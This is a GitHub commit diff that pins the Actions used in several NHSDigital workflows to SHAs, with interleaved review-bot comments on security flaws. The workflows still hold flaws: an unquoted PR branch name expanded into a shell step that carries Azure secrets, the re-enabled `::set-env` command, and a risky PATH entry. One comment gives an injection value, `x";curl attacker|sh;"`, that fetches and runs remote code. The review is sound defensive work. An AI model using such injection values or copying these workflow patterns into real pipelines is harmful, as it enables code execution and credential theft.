
Commit ae6dae5

Merge pull request #575 from NHSDigital/APM-7202
APM-7202
2 parents f0ab7fe + c1c6912 commit ae6dae5


5 files changed

+74
-75
lines changed


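--- a/.github/dependabot.yml
+++ b/.github/dependabot.yml
@@ -51,4 +51,6 @@ updates:
     schedule:
       interval: "daily"
     target-branch: "master"
-    labels: ["dependencies", "github-actions"]
+    labels: ["dependencies", "github-actions"]
+    cooldown:
+      default-days: 7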
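Review bot: The new `cooldown` block at the end of this hunk carries no explanation of why a 7-day delay was chosen, and the reason is a security control worth recording next to it, e.g. `# Hold new action releases for 7 days so a compromised or yanked upstream tag is noticed before Dependabot proposes (and auto-merge lands) the bump`. Note the cooldown only slows version updates; as far as I recall GitHub's docs, Dependabot security updates are not subject to it, so a fix for a known CVE should still arrive promptly — worth confirming against the current docs. This hunk covers only the github-actions update entry; whether the other ecosystems in the file received the same treatment is not visible here.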

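--- a/.github/workflows/continuous-integration.yml
+++ b/.github/workflows/continuous-integration.yml
@@ -6,20 +6,20 @@ jobs:
   test_deployments:
     runs-on: ubuntu-latest
     steps:
-      - name: Checkout Scripts
-        uses: actions/checkout@v2
+      - name: Checkout Scripts
+        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
 
-      - name: Test Pull Request Deployments
-        env:
-          AZURE_TOKEN: "${{ secrets.AZURE_TOKEN }}"
-          AZ_CLIENT_ID: "${{ secrets.AZ_CLIENT_ID }}"
-          AZ_CLIENT_SECRET: "${{ secrets.AZ_CLIENT_SECRET }}"
-          AZ_CLIENT_TENANT: "${{ secrets.AZ_CLIENT_TENANT }}"
-        run: |
-          export BRANCH_NAME="${{ github.event.pull_request.head.ref }}"
-          export NOTIFY_COMMIT_SHA="${{ github.event.pull_request.head.sha }}"
-          export UTILS_PR_NUMBER="${{ github.event.pull_request.number }}"
-          echo UTILS_PR_NUMBER=${UTILS_PR_NUMBER}
-          echo BRANCH_NAME=${BRANCH_NAME}
-          echo NOTIFY_COMMIT_SHA=${NOTIFY_COMMIT_SHA}
-          python3 scripts/test_pull_request_deployments.py
+      - name: Test Pull Request Deployments
+        env:
+          AZURE_TOKEN: "${{ secrets.AZURE_TOKEN }}"
+          AZ_CLIENT_ID: "${{ secrets.AZ_CLIENT_ID }}"
+          AZ_CLIENT_SECRET: "${{ secrets.AZ_CLIENT_SECRET }}"
+          AZ_CLIENT_TENANT: "${{ secrets.AZ_CLIENT_TENANT }}"
+        run: |
+          export BRANCH_NAME="${{ github.event.pull_request.head.ref }}"
+          export NOTIFY_COMMIT_SHA="${{ github.event.pull_request.head.sha }}"
+          export UTILS_PR_NUMBER="${{ github.event.pull_request.number }}"
+          echo UTILS_PR_NUMBER=${UTILS_PR_NUMBER}
+          echo BRANCH_NAME=${BRANCH_NAME}
+          echo NOTIFY_COMMIT_SHA=${NOTIFY_COMMIT_SHA}
+          python3 scripts/test_pull_request_deployments.py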
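Review bot: The new side still expands `${{ github.event.pull_request.head.ref }}` directly inside the `run:` script (new line 19); the branch name is chosen by the PR author, so a name such as `x";curl attacker|sh;"` is spliced into the shell before bash ever sees it, and pinning the checkout SHA does nothing for that. The same step holds `AZ_CLIENT_SECRET` and the other Azure credentials, so the blast radius is credential theft if the workflow's trigger (outside this hunk) is `pull_request_target` or otherwise runs for fork PRs — worth checking. The fix is to pass the event values through `env:` and let the shell read them as ordinary variables; `head.sha` and `number` cannot contain shell metacharacters but moving them too keeps the step consistent. Quoting the `echo` arguments is a small bonus while here.
```yaml
        env:
          # … unchanged: AZURE_TOKEN / AZ_CLIENT_* secrets …
          BRANCH_NAME: ${{ github.event.pull_request.head.ref }}
          NOTIFY_COMMIT_SHA: ${{ github.event.pull_request.head.sha }}
          UTILS_PR_NUMBER: ${{ github.event.pull_request.number }}
        run: |
          echo "UTILS_PR_NUMBER=${UTILS_PR_NUMBER}"
          echo "BRANCH_NAME=${BRANCH_NAME}"
          echo "NOTIFY_COMMIT_SHA=${NOTIFY_COMMIT_SHA}"
          python3 scripts/test_pull_request_deployments.py
```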

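--- a/.github/workflows/dependabot-auto-merge.yml
+++ b/.github/workflows/dependabot-auto-merge.yml
@@ -19,7 +19,7 @@ jobs:
     steps:
       - name: Fetch Dependabot metadata
         id: meta
-        uses: dependabot/fetch-metadata@v2
+        uses: dependabot/fetch-metadata@21025c705c08248db411dc16f3619e6b5f9ea21a # v2.5.0
         with:
           github-token: ${{ secrets.GITHUB_TOKEN }}
 
@@ -34,4 +34,4 @@ jobs:
         run: gh pr merge --auto --squash "$PR_URL"
         env:
           PR_URL: ${{ github.event.pull_request.html_url }}
-          GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+          GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}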

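--- a/.github/workflows/publish.yml
+++ b/.github/workflows/publish.yml
@@ -3,49 +3,49 @@ name: Publish / Calculate Version
 on: push
 
 jobs:
-  build:
-    name: calculate version
-    runs-on: ubuntu-22.04
-    steps:
-      - name: Checkout
-        uses: actions/checkout@v2
-        with:
-          fetch-depth: 0 # This causes all history to be fetched, which is required for calculate-version to function
-
-      - name: Install Python 3.13
-        uses: actions/setup-python@v5
-        with:
-          python-version: 3.13
-
-      - name: Install poetry
-        run: pip install poetry
-
-      - name: Cache poetry packages
-        uses: actions/cache@v4
-        id: cache
-        with:
-          path: ~/.venv
-          key: ${{ runner.os }}-utils-venv-${{ hashFiles('**/poetry.lock') }}
-
-      - name: Install
-        run: poetry install
-        if: steps.cache.outputs.cache-hit != 'true'
-
-      - name: Set SPEC_VERSION env var
-        run: |
-          version="$(poetry run python scripts/calculate_version.py)"
-          echo "${version}"
-          echo ::set-env name=SPEC_VERSION::${version}
-        env:
-          ACTIONS_ALLOW_UNSECURE_COMMANDS: true
-
-      - name: Create release (master only)
-        id: create-release
-        if: github.ref == 'refs/heads/master'
-        uses: actions/create-release@v1
-        continue-on-error: true
-        env:
-          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
-        with:
-          tag_name: ${{ env.SPEC_VERSION }}
-          release_name: ${{ env.SPEC_VERSION }}
+  build:
+    name: calculate version
+    runs-on: ubuntu-22.04
+    steps:
+      - name: Checkout
+        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
+        with:
+          fetch-depth: 0 # This causes all history to be fetched, which is required for calculate-version to function
+
+      - name: Install Python 3.13
+        uses: actions/setup-python@e797f83bcb11b83ae66e0230d6156d7c80228e7c # v6.0.0
+        with:
+          python-version: 3.13
+
+      - name: Install poetry
+        run: pip install poetry
+
+      - name: Cache poetry packages
+        uses: actions/cache@cdf6c1fa76f9f475f3d7449005a359c84ca0f306 # v5.0.3
+        id: cache
+        with:
+          path: ~/.venv
+          key: ${{ runner.os }}-utils-venv-${{ hashFiles('**/poetry.lock') }}
+
+      - name: Install
+        run: poetry install
+        if: steps.cache.outputs.cache-hit != 'true'
+
+      - name: Set SPEC_VERSION env var
+        run: |
+          version="$(poetry run python scripts/calculate_version.py)"
+          echo "${version}"
+          echo ::set-env name=SPEC_VERSION::${version}
+        env:
+          ACTIONS_ALLOW_UNSECURE_COMMANDS: true
+
+      - name: Create release (master only)
+        id: create-release
+        if: github.ref == 'refs/heads/master'
+        uses: actions/create-release@0cb9c9b65d5d1901c1f53e5e66eaf4afd303e70e # v1.1.4
+        continue-on-error: true
+        env:
+          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+        with:
+          tag_name: ${{ env.SPEC_VERSION }}
+          release_name: ${{ env.SPEC_VERSION }}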
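Review bot: New lines 38-40 keep the deprecated `::set-env` workflow command and re-enable it with `ACTIONS_ALLOW_UNSECURE_COMMANDS: true`; that command was disabled after CVE-2020-15228 because any step output containing a crafted `::set-env` line can overwrite environment variables such as `PATH`, so pinning the surrounding actions to SHAs leaves the weakest part of this job untouched. The supported replacement is a one-line change, `echo "SPEC_VERSION=${version}" >> "$GITHUB_ENV"`, after which the `env:` block with `ACTIONS_ALLOW_UNSECURE_COMMANDS` on lines 39-40 can be deleted. Separately, `actions/create-release` is, as far as I know, archived and unmaintained, so the SHA pin freezes it without any prospect of fixes; `gh release create "$SPEC_VERSION"` with `GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}` does the same job with a supported tool. Minor: `python-version: 3.13` is an unquoted float and happens to round-trip, but `"3.13"` avoids the `3.10` → `3.1` trap the next time it is bumped.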

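--- a/.github/workflows/sbom.yml
+++ b/.github/workflows/sbom.yml
@@ -24,10 +24,10 @@ jobs:
       contents: write
     steps:
       - name: Checkout
-        uses: actions/checkout@v5
+        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
 
       - name: Setup Python 3.13
-        uses: actions/setup-python@v5
+        uses: actions/setup-python@e797f83bcb11b83ae66e0230d6156d7c80228e7c # v6.0.0
         with:
           python-version: "3.13"
 
@@ -56,7 +56,7 @@ jobs:
           chmod +x syft
 
           # Add to PATH for subsequent steps
-          echo "$(pwd)" >> $GITHUB_PATH
+          echo "$(pwd)" >> $GITHUB_PATH
 
       - name: Create SBOM
         run: bash scripts/create-sbom.sh terraform python tflint
@@ -69,7 +69,7 @@ jobs:
           python .github/scripts/sbom_json_to_csv.py sbom.json SBOM_${REPO_NAME}.csv
 
       - name: Upload SBOM CSV as artifact
-        uses: actions/upload-artifact@v4
+        uses: actions/upload-artifact@bbbca2ddaa5d8feaa63e36b76fdaad77386f024f # v7.0.0
         with:
           name: sbom-csv
           path: SBOM_${{ github.event.repository.name }}.csv
@@ -81,18 +81,15 @@ jobs:
       - name: Scan SBOM for Vulnerabilities (JSON)
         run: |
           grype sbom:sbom.json -o json > grype-report.json
-
-
 
       - name: Convert Grype JSON to CSV
         run: |
           pip install --upgrade pip
           REPO_NAME=$(basename $GITHUB_REPOSITORY)
           python .github/scripts/grype_json_to_csv.py grype-report.json grype-report-${REPO_NAME}.csv
 
-
       - name: Upload Vulnerability Report
-        uses: actions/upload-artifact@v4
+        uses: actions/upload-artifact@bbbca2ddaa5d8feaa63e36b76fdaad77386f024f # v7.0.0
         with:
           name: grype-report
           path: grype-report-${{ github.event.repository.name }}.csv
@@ -104,7 +101,7 @@ jobs:
           python .github/scripts/sbom_packages_to_csv.py sbom.json $REPO_NAME
 
       - name: Upload Package Inventory CSV
-        uses: actions/upload-artifact@v4
+        uses: actions/upload-artifact@bbbca2ddaa5d8feaa63e36b76fdaad77386f024f # v7.0.0
         with:
           name: sbom-packages
-          path: sbom-packages-${{ github.event.repository.name }}.csv
+          path: sbom-packages-${{ github.event.repository.name }}.csv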
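Review bot: `echo "$(pwd)" >> $GITHUB_PATH` (new line 59) puts the checked-out repository root at the front of `PATH` for every later step — `GITHUB_PATH` prepends, not appends — so any executable committed to the repo under a name like `python`, `pip`, `bash` or `grype` silently replaces the real one in the `Create SBOM`, `Scan` and `Convert` steps; if this workflow ever runs against PR-controlled content that is arbitrary code execution with `contents: write`. Give the downloaded binary its own directory instead: `mkdir -p "$RUNNER_TEMP/bin"`, `mv syft "$RUNNER_TEMP/bin/"`, `echo "$RUNNER_TEMP/bin" >> "$GITHUB_PATH"` (the syft download itself is outside the hunk, so I cannot tell whether its checksum or signature is verified before `chmod +x`). The grype step on new line 83 writes a report but never gates the build (no `--fail-on`), which may be deliberate since the CSVs are uploaded as artifacts; if so a comment saying the scan is report-only would stop the next reader from assuming it blocks. The `contents: write` on line 24 is broader than the visible upload-artifact steps need, but later steps in the job are not in this section, so it may be required there.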
